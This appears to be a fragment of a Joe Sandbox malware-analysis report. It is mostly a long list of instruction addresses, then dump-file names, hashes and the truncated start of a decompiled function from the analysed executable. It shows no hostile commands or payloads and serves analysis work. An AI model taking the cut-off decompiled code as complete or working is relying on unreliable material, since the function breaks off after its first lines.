                                                                                                                                                                            0x00406a23
                                                                                                                                                                            0x00406a26
                                                                                                                                                                            0x00406a26
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406344
                                                                                                                                                                            0x00406346
                                                                                                                                                                            0x00406349
                                                                                                                                                                            0x004063ba
                                                                                                                                                                            0x004063bd
                                                                                                                                                                            0x004063c0
                                                                                                                                                                            0x004063c7
                                                                                                                                                                            0x004063d1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004063d1
                                                                                                                                                                            0x0040634b
                                                                                                                                                                            0x0040634f
                                                                                                                                                                            0x00406352
                                                                                                                                                                            0x00406354
                                                                                                                                                                            0x00406357
                                                                                                                                                                            0x0040635a
                                                                                                                                                                            0x0040635c
                                                                                                                                                                            0x0040635f
                                                                                                                                                                            0x00406361
                                                                                                                                                                            0x00406366
                                                                                                                                                                            0x00406369
                                                                                                                                                                            0x0040636c
                                                                                                                                                                            0x00406370
                                                                                                                                                                            0x00406377
                                                                                                                                                                            0x0040637a
                                                                                                                                                                            0x00406381
                                                                                                                                                                            0x00406385
                                                                                                                                                                            0x0040638d
                                                                                                                                                                            0x0040638d
                                                                                                                                                                            0x0040638d
                                                                                                                                                                            0x00406387
                                                                                                                                                                            0x00406387
                                                                                                                                                                            0x00406387
                                                                                                                                                                            0x0040637c
                                                                                                                                                                            0x0040637c
                                                                                                                                                                            0x0040637c
                                                                                                                                                                            0x00406391
                                                                                                                                                                            0x00406394
                                                                                                                                                                            0x004063b2
                                                                                                                                                                            0x004063b4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004063b4
                                                                                                                                                                            0x00406396
                                                                                                                                                                            0x00406399
                                                                                                                                                                            0x0040639c
                                                                                                                                                                            0x0040639f
                                                                                                                                                                            0x004063a1
                                                                                                                                                                            0x004063a1
                                                                                                                                                                            0x004063a1
                                                                                                                                                                            0x004063a4
                                                                                                                                                                            0x004063a7
                                                                                                                                                                            0x004063a9
                                                                                                                                                                            0x004063aa
                                                                                                                                                                            0x004063ad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004065e3
                                                                                                                                                                            0x004065e7
                                                                                                                                                                            0x00406605
                                                                                                                                                                            0x00406608
                                                                                                                                                                            0x0040660f
                                                                                                                                                                            0x00406612
                                                                                                                                                                            0x00406615
                                                                                                                                                                            0x00406618
                                                                                                                                                                            0x0040661b
                                                                                                                                                                            0x0040661e
                                                                                                                                                                            0x00406620
                                                                                                                                                                            0x00406627
                                                                                                                                                                            0x00406628
                                                                                                                                                                            0x0040662a
                                                                                                                                                                            0x0040662d
                                                                                                                                                                            0x00406630
                                                                                                                                                                            0x00406633
                                                                                                                                                                            0x00406633
                                                                                                                                                                            0x00406638
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406638
                                                                                                                                                                            0x004065e9
                                                                                                                                                                            0x004065ec
                                                                                                                                                                            0x004065ef
                                                                                                                                                                            0x004065f9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040664d
                                                                                                                                                                            0x00406651
                                                                                                                                                                            0x00406674
                                                                                                                                                                            0x00406677
                                                                                                                                                                            0x0040667a
                                                                                                                                                                            0x00406684
                                                                                                                                                                            0x00406653
                                                                                                                                                                            0x00406653
                                                                                                                                                                            0x00406656
                                                                                                                                                                            0x00406659
                                                                                                                                                                            0x0040665c
                                                                                                                                                                            0x00406669
                                                                                                                                                                            0x0040666c
                                                                                                                                                                            0x0040666c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406690
                                                                                                                                                                            0x00406694
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040669a
                                                                                                                                                                            0x0040669e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004066a4
                                                                                                                                                                            0x004066a6
                                                                                                                                                                            0x004066aa
                                                                                                                                                                            0x004066aa
                                                                                                                                                                            0x004066ad
                                                                                                                                                                            0x004066b1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406701
                                                                                                                                                                            0x00406705
                                                                                                                                                                            0x0040670c
                                                                                                                                                                            0x0040670f
                                                                                                                                                                            0x00406712
                                                                                                                                                                            0x0040671c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040671c
                                                                                                                                                                            0x00406707
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406728
                                                                                                                                                                            0x0040672c
                                                                                                                                                                            0x00406733
                                                                                                                                                                            0x00406736
                                                                                                                                                                            0x00406739
                                                                                                                                                                            0x0040672e
                                                                                                                                                                            0x0040672e
                                                                                                                                                                            0x0040672e
                                                                                                                                                                            0x0040673c
                                                                                                                                                                            0x0040673f
                                                                                                                                                                            0x00406742
                                                                                                                                                                            0x00406742
                                                                                                                                                                            0x00406745
                                                                                                                                                                            0x00406748
                                                                                                                                                                            0x0040674b
                                                                                                                                                                            0x0040674b
                                                                                                                                                                            0x0040674e
                                                                                                                                                                            0x00406755
                                                                                                                                                                            0x0040675a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004067e8
                                                                                                                                                                            0x004067e8
                                                                                                                                                                            0x004067ec
                                                                                                                                                                            0x00406b8a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b8a
                                                                                                                                                                            0x004067f2
                                                                                                                                                                            0x004067f5
                                                                                                                                                                            0x004067f8
                                                                                                                                                                            0x004067fc
                                                                                                                                                                            0x004067ff
                                                                                                                                                                            0x00406805
                                                                                                                                                                            0x00406807
                                                                                                                                                                            0x00406807
                                                                                                                                                                            0x00406807
                                                                                                                                                                            0x0040680a
                                                                                                                                                                            0x0040680d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004063dd
                                                                                                                                                                            0x004063dd
                                                                                                                                                                            0x004063e1
                                                                                                                                                                            0x00406b4e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b4e
                                                                                                                                                                            0x004063e7
                                                                                                                                                                            0x004063ea
                                                                                                                                                                            0x004063ed
                                                                                                                                                                            0x004063f1
                                                                                                                                                                            0x004063f4
                                                                                                                                                                            0x004063fa
                                                                                                                                                                            0x004063fc
                                                                                                                                                                            0x004063fc
                                                                                                                                                                            0x004063fc
                                                                                                                                                                            0x004063ff
                                                                                                                                                                            0x00406402
                                                                                                                                                                            0x00406402
                                                                                                                                                                            0x00406405
                                                                                                                                                                            0x00406408
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040640e
                                                                                                                                                                            0x00406414
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040641a
                                                                                                                                                                            0x0040641a
                                                                                                                                                                            0x0040641e
                                                                                                                                                                            0x00406421
                                                                                                                                                                            0x00406424
                                                                                                                                                                            0x00406427
                                                                                                                                                                            0x0040642a
                                                                                                                                                                            0x0040642b
                                                                                                                                                                            0x0040642e
                                                                                                                                                                            0x00406430
                                                                                                                                                                            0x00406436
                                                                                                                                                                            0x00406439
                                                                                                                                                                            0x0040643c
                                                                                                                                                                            0x0040643f
                                                                                                                                                                            0x00406442
                                                                                                                                                                            0x00406445
                                                                                                                                                                            0x00406448
                                                                                                                                                                            0x00406464
                                                                                                                                                                            0x00406467
                                                                                                                                                                            0x0040646a
                                                                                                                                                                            0x0040646d
                                                                                                                                                                            0x00406474
                                                                                                                                                                            0x00406478
                                                                                                                                                                            0x0040647a
                                                                                                                                                                            0x0040647e
                                                                                                                                                                            0x0040644a
                                                                                                                                                                            0x0040644a
                                                                                                                                                                            0x0040644e
                                                                                                                                                                            0x00406456
                                                                                                                                                                            0x0040645b
                                                                                                                                                                            0x0040645d
                                                                                                                                                                            0x0040645f
                                                                                                                                                                            0x0040645f
                                                                                                                                                                            0x00406481
                                                                                                                                                                            0x00406488
                                                                                                                                                                            0x0040648b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406491
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406491
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406496
                                                                                                                                                                            0x00406496
                                                                                                                                                                            0x0040649a
                                                                                                                                                                            0x00406b5a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b5a
                                                                                                                                                                            0x004064a0
                                                                                                                                                                            0x004064a3
                                                                                                                                                                            0x004064a6
                                                                                                                                                                            0x004064aa
                                                                                                                                                                            0x004064ad
                                                                                                                                                                            0x004064b3
                                                                                                                                                                            0x004064b5
                                                                                                                                                                            0x004064b5
                                                                                                                                                                            0x004064b5
                                                                                                                                                                            0x004064b8
                                                                                                                                                                            0x004064bb
                                                                                                                                                                            0x004064bb
                                                                                                                                                                            0x004064bb
                                                                                                                                                                            0x004064c1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004064c3
                                                                                                                                                                            0x004064c6
                                                                                                                                                                            0x004064c9
                                                                                                                                                                            0x004064cc
                                                                                                                                                                            0x004064cf
                                                                                                                                                                            0x004064d2
                                                                                                                                                                            0x004064d5
                                                                                                                                                                            0x004064d8
                                                                                                                                                                            0x004064db
                                                                                                                                                                            0x004064de
                                                                                                                                                                            0x004064e1
                                                                                                                                                                            0x004064f9
                                                                                                                                                                            0x004064fc
                                                                                                                                                                            0x004064ff
                                                                                                                                                                            0x00406502
                                                                                                                                                                            0x00406502
                                                                                                                                                                            0x00406505
                                                                                                                                                                            0x00406509
                                                                                                                                                                            0x0040650b
                                                                                                                                                                            0x004064e3
                                                                                                                                                                            0x004064e3
                                                                                                                                                                            0x004064eb
                                                                                                                                                                            0x004064f0
                                                                                                                                                                            0x004064f2
                                                                                                                                                                            0x004064f4
                                                                                                                                                                            0x004064f4
                                                                                                                                                                            0x0040650e
                                                                                                                                                                            0x00406515
                                                                                                                                                                            0x00406518
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040651a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040651a
                                                                                                                                                                            0x00406518
                                                                                                                                                                            0x0040651f
                                                                                                                                                                            0x0040651f
                                                                                                                                                                            0x0040651f
                                                                                                                                                                            0x0040651f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040655a
                                                                                                                                                                            0x0040655a
                                                                                                                                                                            0x0040655e
                                                                                                                                                                            0x00406b66
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b66
                                                                                                                                                                            0x00406564
                                                                                                                                                                            0x00406567
                                                                                                                                                                            0x0040656a
                                                                                                                                                                            0x0040656e
                                                                                                                                                                            0x00406571
                                                                                                                                                                            0x00406577
                                                                                                                                                                            0x00406579
                                                                                                                                                                            0x00406579
                                                                                                                                                                            0x00406579
                                                                                                                                                                            0x0040657c
                                                                                                                                                                            0x0040657f
                                                                                                                                                                            0x0040657f
                                                                                                                                                                            0x00406585
                                                                                                                                                                            0x00406523
                                                                                                                                                                            0x00406523
                                                                                                                                                                            0x00406526
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406526
                                                                                                                                                                            0x00406587
                                                                                                                                                                            0x00406587
                                                                                                                                                                            0x0040658a
                                                                                                                                                                            0x0040658d
                                                                                                                                                                            0x00406590
                                                                                                                                                                            0x00406593
                                                                                                                                                                            0x00406596
                                                                                                                                                                            0x00406599
                                                                                                                                                                            0x0040659c
                                                                                                                                                                            0x0040659f
                                                                                                                                                                            0x004065a2
                                                                                                                                                                            0x004065a5
                                                                                                                                                                            0x004065bd
                                                                                                                                                                            0x004065c0
                                                                                                                                                                            0x004065c3
                                                                                                                                                                            0x004065c6
                                                                                                                                                                            0x004065c6
                                                                                                                                                                            0x004065c9
                                                                                                                                                                            0x004065cd
                                                                                                                                                                            0x004065cf
                                                                                                                                                                            0x004065a7
                                                                                                                                                                            0x004065a7
                                                                                                                                                                            0x004065af
                                                                                                                                                                            0x004065b4
                                                                                                                                                                            0x004065b6
                                                                                                                                                                            0x004065b8
                                                                                                                                                                            0x004065b8
                                                                                                                                                                            0x004065d2
                                                                                                                                                                            0x004065d9
                                                                                                                                                                            0x004065dc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004065de
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004065de
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040686b
                                                                                                                                                                            0x0040686b
                                                                                                                                                                            0x0040686f
                                                                                                                                                                            0x00406b96
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b96
                                                                                                                                                                            0x00406875
                                                                                                                                                                            0x00406878
                                                                                                                                                                            0x0040687b
                                                                                                                                                                            0x0040687f
                                                                                                                                                                            0x00406882
                                                                                                                                                                            0x00406888
                                                                                                                                                                            0x0040688a
                                                                                                                                                                            0x0040688a
                                                                                                                                                                            0x0040688a
                                                                                                                                                                            0x0040688d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040663b
                                                                                                                                                                            0x0040663b
                                                                                                                                                                            0x0040663e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040697a
                                                                                                                                                                            0x0040697e
                                                                                                                                                                            0x004069a0
                                                                                                                                                                            0x004069a3
                                                                                                                                                                            0x004069ad
                                                                                                                                                                            0x004069b0
                                                                                                                                                                            0x004069b0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004069b0
                                                                                                                                                                            0x00406980
                                                                                                                                                                            0x00406983
                                                                                                                                                                            0x00406987
                                                                                                                                                                            0x0040698a
                                                                                                                                                                            0x0040698a
                                                                                                                                                                            0x0040698d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406a37
                                                                                                                                                                            0x00406a3b
                                                                                                                                                                            0x00406a59
                                                                                                                                                                            0x00406a59
                                                                                                                                                                            0x00406a59
                                                                                                                                                                            0x00406a60
                                                                                                                                                                            0x00406a67
                                                                                                                                                                            0x00406a6e
                                                                                                                                                                            0x00406a6e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406a6e
                                                                                                                                                                            0x00406a3d
                                                                                                                                                                            0x00406a40
                                                                                                                                                                            0x00406a43
                                                                                                                                                                            0x00406a46
                                                                                                                                                                            0x00406a4d
                                                                                                                                                                            0x00406991
                                                                                                                                                                            0x00406991
                                                                                                                                                                            0x00406994
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b28
                                                                                                                                                                            0x00406b2b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406762
                                                                                                                                                                            0x00406764
                                                                                                                                                                            0x0040676b
                                                                                                                                                                            0x0040676c
                                                                                                                                                                            0x0040676e
                                                                                                                                                                            0x00406771
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406779
                                                                                                                                                                            0x0040677c
                                                                                                                                                                            0x0040677f
                                                                                                                                                                            0x00406781
                                                                                                                                                                            0x00406783
                                                                                                                                                                            0x00406783
                                                                                                                                                                            0x00406784
                                                                                                                                                                            0x00406787
                                                                                                                                                                            0x0040678e
                                                                                                                                                                            0x00406791
                                                                                                                                                                            0x0040679f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406a75
                                                                                                                                                                            0x00406a75
                                                                                                                                                                            0x00406a78
                                                                                                                                                                            0x00406a7f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406a84
                                                                                                                                                                            0x00406a84
                                                                                                                                                                            0x00406a88
                                                                                                                                                                            0x00406bc0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406bc0
                                                                                                                                                                            0x00406a8e
                                                                                                                                                                            0x00406a91
                                                                                                                                                                            0x00406a94
                                                                                                                                                                            0x00406a98
                                                                                                                                                                            0x00406a9b
                                                                                                                                                                            0x00406aa1
                                                                                                                                                                            0x00406aa3
                                                                                                                                                                            0x00406aa3
                                                                                                                                                                            0x00406aa3
                                                                                                                                                                            0x00406aa6
                                                                                                                                                                            0x00406aa9
                                                                                                                                                                            0x00406aa9
                                                                                                                                                                            0x00406aa9
                                                                                                                                                                            0x00406aa9
                                                                                                                                                                            0x00406aac
                                                                                                                                                                            0x00406aac
                                                                                                                                                                            0x00406ab0
                                                                                                                                                                            0x00406b10
                                                                                                                                                                            0x00406b13
                                                                                                                                                                            0x00406b18
                                                                                                                                                                            0x00406b19
                                                                                                                                                                            0x00406b1b
                                                                                                                                                                            0x00406b1d
                                                                                                                                                                            0x00406b20
                                                                                                                                                                            0x00406a2c
                                                                                                                                                                            0x00406a2c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406a2c
                                                                                                                                                                            0x00406ab2
                                                                                                                                                                            0x00406ab8
                                                                                                                                                                            0x00406abb
                                                                                                                                                                            0x00406abe
                                                                                                                                                                            0x00406ac1
                                                                                                                                                                            0x00406ac4
                                                                                                                                                                            0x00406ac7
                                                                                                                                                                            0x00406aca
                                                                                                                                                                            0x00406acd
                                                                                                                                                                            0x00406ad0
                                                                                                                                                                            0x00406ad3
                                                                                                                                                                            0x00406aec
                                                                                                                                                                            0x00406aef
                                                                                                                                                                            0x00406af2
                                                                                                                                                                            0x00406af5
                                                                                                                                                                            0x00406af9
                                                                                                                                                                            0x00406afb
                                                                                                                                                                            0x00406afb
                                                                                                                                                                            0x00406afc
                                                                                                                                                                            0x00406aff
                                                                                                                                                                            0x00406ad5
                                                                                                                                                                            0x00406ad5
                                                                                                                                                                            0x00406add
                                                                                                                                                                            0x00406ae2
                                                                                                                                                                            0x00406ae4
                                                                                                                                                                            0x00406ae7
                                                                                                                                                                            0x00406ae7
                                                                                                                                                                            0x00406b02
                                                                                                                                                                            0x00406b09
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b0b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b0b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004067a7
                                                                                                                                                                            0x004067aa
                                                                                                                                                                            0x004067e0
                                                                                                                                                                            0x00406910
                                                                                                                                                                            0x00406910
                                                                                                                                                                            0x00406910
                                                                                                                                                                            0x00406910
                                                                                                                                                                            0x00406913
                                                                                                                                                                            0x00406913
                                                                                                                                                                            0x00406916
                                                                                                                                                                            0x00406918
                                                                                                                                                                            0x00406ba2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406ba2
                                                                                                                                                                            0x0040691e
                                                                                                                                                                            0x00406921
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406927
                                                                                                                                                                            0x0040692b
                                                                                                                                                                            0x0040692e
                                                                                                                                                                            0x0040692e
                                                                                                                                                                            0x0040692e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040692e
                                                                                                                                                                            0x004067ac
                                                                                                                                                                            0x004067ae
                                                                                                                                                                            0x004067b0
                                                                                                                                                                            0x004067b2
                                                                                                                                                                            0x004067b5
                                                                                                                                                                            0x004067b6
                                                                                                                                                                            0x004067b8
                                                                                                                                                                            0x004067ba
                                                                                                                                                                            0x004067bd
                                                                                                                                                                            0x004067c0
                                                                                                                                                                            0x004067d6
                                                                                                                                                                            0x004067db
                                                                                                                                                                            0x00406813
                                                                                                                                                                            0x00406813
                                                                                                                                                                            0x00406817
                                                                                                                                                                            0x00406843
                                                                                                                                                                            0x00406845
                                                                                                                                                                            0x0040684c
                                                                                                                                                                            0x0040684f
                                                                                                                                                                            0x00406852
                                                                                                                                                                            0x00406852
                                                                                                                                                                            0x00406857
                                                                                                                                                                            0x00406857
                                                                                                                                                                            0x00406859
                                                                                                                                                                            0x0040685c
                                                                                                                                                                            0x00406863
                                                                                                                                                                            0x00406866
                                                                                                                                                                            0x00406893
                                                                                                                                                                            0x00406893
                                                                                                                                                                            0x00406896
                                                                                                                                                                            0x00406899
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x0040689b
                                                                                                                                                                            0x004068a1
                                                                                                                                                                            0x004068a4
                                                                                                                                                                            0x004068a7
                                                                                                                                                                            0x004068aa
                                                                                                                                                                            0x004068ad
                                                                                                                                                                            0x004068b0
                                                                                                                                                                            0x004068b3
                                                                                                                                                                            0x004068b6
                                                                                                                                                                            0x004068b9
                                                                                                                                                                            0x004068bc
                                                                                                                                                                            0x004068d5
                                                                                                                                                                            0x004068d7
                                                                                                                                                                            0x004068da
                                                                                                                                                                            0x004068db
                                                                                                                                                                            0x004068de
                                                                                                                                                                            0x004068e0
                                                                                                                                                                            0x004068e3
                                                                                                                                                                            0x004068e5
                                                                                                                                                                            0x004068e7
                                                                                                                                                                            0x004068ea
                                                                                                                                                                            0x004068ec
                                                                                                                                                                            0x004068ef
                                                                                                                                                                            0x004068f3
                                                                                                                                                                            0x004068f5
                                                                                                                                                                            0x004068f5
                                                                                                                                                                            0x004068f6
                                                                                                                                                                            0x004068f9
                                                                                                                                                                            0x004068fc
                                                                                                                                                                            0x004068be
                                                                                                                                                                            0x004068be
                                                                                                                                                                            0x004068c6
                                                                                                                                                                            0x004068cb
                                                                                                                                                                            0x004068cd
                                                                                                                                                                            0x004068d0
                                                                                                                                                                            0x004068d0
                                                                                                                                                                            0x004068ff
                                                                                                                                                                            0x00406906
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00406890
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406908
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406908
                                                                                                                                                                            0x00406906
                                                                                                                                                                            0x00406819
                                                                                                                                                                            0x0040681c
                                                                                                                                                                            0x0040681e
                                                                                                                                                                            0x00406821
                                                                                                                                                                            0x00406824
                                                                                                                                                                            0x00406827
                                                                                                                                                                            0x00406829
                                                                                                                                                                            0x0040682c
                                                                                                                                                                            0x0040682f
                                                                                                                                                                            0x0040682f
                                                                                                                                                                            0x00406832
                                                                                                                                                                            0x00406832
                                                                                                                                                                            0x00406835
                                                                                                                                                                            0x0040683c
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00406810
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040683e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040683e
                                                                                                                                                                            0x0040683c
                                                                                                                                                                            0x004067c2
                                                                                                                                                                            0x004067c5
                                                                                                                                                                            0x004067c7
                                                                                                                                                                            0x004067ca
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406529
                                                                                                                                                                            0x00406529
                                                                                                                                                                            0x0040652d
                                                                                                                                                                            0x00406b72
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b72
                                                                                                                                                                            0x00406533
                                                                                                                                                                            0x00406536
                                                                                                                                                                            0x00406539
                                                                                                                                                                            0x0040653c
                                                                                                                                                                            0x0040653f
                                                                                                                                                                            0x00406542
                                                                                                                                                                            0x00406545
                                                                                                                                                                            0x00406547
                                                                                                                                                                            0x0040654a
                                                                                                                                                                            0x0040654d
                                                                                                                                                                            0x00406550
                                                                                                                                                                            0x00406552
                                                                                                                                                                            0x00406552
                                                                                                                                                                            0x00406552
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004066b4
                                                                                                                                                                            0x004066b4
                                                                                                                                                                            0x004066b8
                                                                                                                                                                            0x00406b7e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b7e
                                                                                                                                                                            0x004066be
                                                                                                                                                                            0x004066c1
                                                                                                                                                                            0x004066c4
                                                                                                                                                                            0x004066c7
                                                                                                                                                                            0x004066c9
                                                                                                                                                                            0x004066c9
                                                                                                                                                                            0x004066c9
                                                                                                                                                                            0x004066cc
                                                                                                                                                                            0x004066cf
                                                                                                                                                                            0x004066d2
                                                                                                                                                                            0x004066d5
                                                                                                                                                                            0x004066d8
                                                                                                                                                                            0x004066db
                                                                                                                                                                            0x004066dc
                                                                                                                                                                            0x004066de
                                                                                                                                                                            0x004066de
                                                                                                                                                                            0x004066de
                                                                                                                                                                            0x004066e1
                                                                                                                                                                            0x004066e4
                                                                                                                                                                            0x004066e7
                                                                                                                                                                            0x004066ea
                                                                                                                                                                            0x004066ea
                                                                                                                                                                            0x004066ea
                                                                                                                                                                            0x004066ed
                                                                                                                                                                            0x004066ef
                                                                                                                                                                            0x004066ef
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406935
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040693b
                                                                                                                                                                            0x0040693e
                                                                                                                                                                            0x00406941
                                                                                                                                                                            0x00406944
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406949
                                                                                                                                                                            0x0040694c
                                                                                                                                                                            0x0040694f
                                                                                                                                                                            0x00406952
                                                                                                                                                                            0x00406955
                                                                                                                                                                            0x00406958
                                                                                                                                                                            0x00406959
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695e
                                                                                                                                                                            0x00406961
                                                                                                                                                                            0x00406964
                                                                                                                                                                            0x00406967
                                                                                                                                                                            0x0040696a
                                                                                                                                                                            0x0040696e
                                                                                                                                                                            0x00406970
                                                                                                                                                                            0x00406973
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406975
                                                                                                                                                                            0x004066f2
                                                                                                                                                                            0x004066f2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004066f2
                                                                                                                                                                            0x00406973
                                                                                                                                                                            0x00406ba8
                                                                                                                                                                            0x00406bca
                                                                                                                                                                            0x00406bd0
                                                                                                                                                                            0x00406bd2
                                                                                                                                                                            0x00406bd9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061d7
                                                                                                                                                                            0x00406bdf
                                                                                                                                                                            0x00406bdf
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5bfff9db2859b877ca6a77ec9405565887134ef839be144d68b3806b8d7c08ac
                                                                                                                                                                            • Instruction ID: 4327eab70650ef0c96a691b493921a8ab8e5ba0d824f916f670fcb6a13d6a8f8
                                                                                                                                                                            • Opcode Fuzzy Hash: 5bfff9db2859b877ca6a77ec9405565887134ef839be144d68b3806b8d7c08ac
                                                                                                                                                                            • Instruction Fuzzy Hash: 11816671D04228DBDF24CFA8C8447ADBBB1FB44315F2181AED856BB281C7786A96DF44
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                            			E004065E3() {
                                                                                                                                                                            				signed int _t539;
                                                                                                                                                                            				unsigned short _t540;
                                                                                                                                                                            				signed int _t541;
                                                                                                                                                                            				void _t542;
                                                                                                                                                                            				signed int _t543;
                                                                                                                                                                            				signed int _t544;
                                                                                                                                                                            				signed int _t573;
                                                                                                                                                                            				signed int _t576;
                                                                                                                                                                            				signed int _t597;
                                                                                                                                                                            				signed int* _t614;
                                                                                                                                                                            				void* _t621;
                                                                                                                                                                            
                                                                                                                                                                            				L0:
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L0:
                                                                                                                                                                            					if( *(_t621 - 0x40) != 1) {
